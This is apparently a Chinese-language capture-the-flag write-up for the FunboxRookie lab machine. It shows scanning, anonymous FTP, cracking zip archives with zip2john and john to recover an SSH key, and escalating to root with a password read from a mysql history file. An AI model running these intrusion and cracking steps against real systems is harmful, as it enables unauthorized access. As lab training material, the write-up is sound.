PG-FunboxRookie

# PG-FunboxRookie Writeup ## Step.1 掃描 ```bash= nmap -T4 192.168.223.107 ``` > 若遇到以下情形可以試著「降速」`T5` --> `T4` > `Warning: 192.168.223.107 giving up on port because retransmission cap hit (2).` 掃描後發現有以下的服務 ``` PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http ``` ## Step.2 搜尋先查看網頁，也測試過爆破，但都沒有結果接著嘗試`ftp` ```bash= ftp 192.168.223.107 ``` 連進去後因為我們沒有任何帳密，所以使用不需密碼的匿名帳號登入`anonymous` `password`的地方直接按 <kbd>Enter</kbd> 就好了 ``` -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip -r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip -rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip ``` 把這些檔案都下載到本地來 ```bash= ftp> prompt Interactive mode off. ftp> mget * ``` 輸入`bye`或 <kbd>Ctrl+D</kbd> 離開`ftp` 用`zip2john`這個工具把密碼提取出來 ```bash= find . -name "*.zip" -exec zip2john {} \; > password.txt ``` 使用`john`和`rockyou.txt`爆破密碼 ```bash= john --wordlist=rockyou.txt password.txt ``` 找到兩個密碼 ``` iubire (tom.zip/id_rsa) catwoman (cathrine.zip/id_rsa) ``` 用`unzip`指令解壓縮`zip`檔 ```bash= unzip tom.zip ``` 解壓縮出了`ssh`的`rsa`私鑰 ``` Archive: tom.zip [tom.zip] id_rsa password: inflating: id_rsa ``` ## Step.3 Exploit ### local flag 用`ssh`連進去伺服器 ```bash= ssh -i id_rsa tom@192.168.223.107 ``` 這樣就可以找到 local flag 了 ![pic1](https://hackmd.io/_uploads/SkPh_O41ke.png =500x) ### root flag 查看發現當前目錄有一個`.mysql_history`，查看就可以找到`tom`的密碼了 ``` tom@funbox2:~$ cat .mysql_history _HiStOrY_V2_ show\040databases; quit create\040database\040'support'; create\040database\040support; use\040support create\040table\040users; show\040tables ; select\040*\040from\040support ; show\040tables; select\040*\040from\040support; insert\040into\040support\040(tom,\040xx11yy22!); quit ``` 用這個密碼`xx11yy22!`進入 root 就可以找到 root flag 了 ![pic2](https://hackmd.io/_uploads/BynTtOVkyl.png)